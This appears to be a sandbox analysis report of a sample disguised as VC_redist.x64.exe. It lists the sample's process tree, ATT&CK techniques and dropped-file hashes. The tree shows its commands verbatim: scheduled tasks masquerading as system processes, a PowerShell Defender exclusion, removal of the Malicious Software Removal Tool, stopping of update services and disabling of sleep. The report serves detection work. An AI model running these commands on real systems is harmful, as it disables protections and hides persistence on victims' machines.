C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Common Files\DESIGNER\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4976
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3648
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Windows\ja-JP\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Windows\en-US\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Windows\en-US\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4124
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3112
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3184
-
C:\ProgramData\VC_redist.x64.exeC:\ProgramData\VC_redist.x64.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2500 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:3208
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:760
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:4692
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2428 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3256
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:4112
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2344
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵PID:5052
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵PID:1912
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵PID:4532
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2792
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵PID:2284
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2368
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5bb93bfa99237b0efc8e476af92d2882c
SHA1aa3285a0166dc7efe30a9156ea0d98af9f83651a
SHA25692820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0
SHA51240d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70
-
Filesize
90B
MD562a4289ada4d67fedd4d54ba96b5b228
SHA1c60573ddfd05111be1adf47d28cd04ecadd5eaef
SHA2566c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50
SHA512d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a
-
Filesize
2.0MB
MD593457a02f578affc1800d7528c5370f3
SHA1fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA5124c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e
-
Filesize
452KB
MD5c4d09d3b3516550ad2ded3b09e28c10c
SHA17a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA25666433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA5122e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2
-
Filesize
1KB
MD543b37d0f48bad1537a4de59ffda50ffe
SHA148ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82
-
Filesize
162KB
MD533d7a84f8ef67fd005f37142232ae97e
SHA11f560717d8038221c9b161716affb7cd6b14056e
SHA256a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5
-
Filesize
1KB
MD5250e75ba9aac6e2e9349bdebc5ef104e
SHA17efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA2567d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA5127f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438
-
Filesize
165KB
MD581a45f1a91448313b76d2e6d5308aa7a
SHA10d615343d5de03da03bce52e11b233093b404083
SHA256fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d
-
Filesize
18KB
MD5785045f8b25cd2e937ddc6b09debe01a
SHA1029c678674f482ababe8bbfdb93152392457109d
SHA25637073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA51240bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9
-
Filesize
1KB
MD57dd8e4f2517f6deec77fba323ac37f81
SHA1e264fb735ddbf68945de4aa62f378fb262fea889
SHA2569ba62fdde3544a604a0ea671bcd5cf62ced3439a1d02d5069ae8b6b5c8652ea6
SHA512b638efaf087717eca0da414824741291a2043e254ade639182c21d35f23e3c24abffb79b43f42fb0fbe5a78aa5b357a4e6f64e4e7e8ef511143a2565bb86185e
-
Filesize
944B
MD50fd3f36f28a947bdd05f1e05acf24489
SHA1cf12e091a80740df2201c5b47049dd231c530ad3
SHA256d36c21211f297a74a801881707690fa7a0a0a31addd3c7ba1522275b8848ab50
SHA5125f132308b06e621aace1091f523649bcb5d1823b478691799791f4154cb96b9897f563eed8ad8db4a03714d815246479372e0920c659eb3fd9006271e58429ee
-
Filesize
944B
MD5aa6672b47c4b32de047db3b0204c8cb6
SHA1fbc33cb99b0dcdde36ba0c1a02af808970b671d9
SHA256f5aa3390c32750a43f2ab55f035c5eff175e3c27f85b35adb524262443a672b6
SHA512b2057a17cdfe8401f57cf255e360d71b0e6b6699c6308486e8ae5e33459fecba32a3d6758c2fa756a0064346c90b3ac5a0016f1a1220a2d5faaec0cbce1eb83d
-
Filesize
156B
MD52a9979c4257d7e16e538c8580c70646f
SHA18b401fb93cb8c8071ecbf2d19c9cb37abe8487fc
SHA2567d5e9bf45fe1cd70114a1efe3beab62a0555e23c23cb17e30edd0b59cc9491f2
SHA512cce51043daa2c44b129a60b85f9a5490c04239e7367e8bddebd67fe8824cf4ac729a18e9103b762bce050b711d3aa88614654282b0b619cd797c6be81b7ffd17
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
905KB
MD5dd1313842898ffaf72d79df643637ded
SHA193a34cb05fdf76869769af09a22711deea44ed28
SHA25681b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9
-
Filesize
3.1MB
MD5975eca3793d5ec51d4bd4041fe4bd595
SHA1f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA25650a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89
-
Filesize
2.3MB
MD5280f228a0fd9232c72c66646f5ac8f27
SHA1f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA2566aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA5125e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e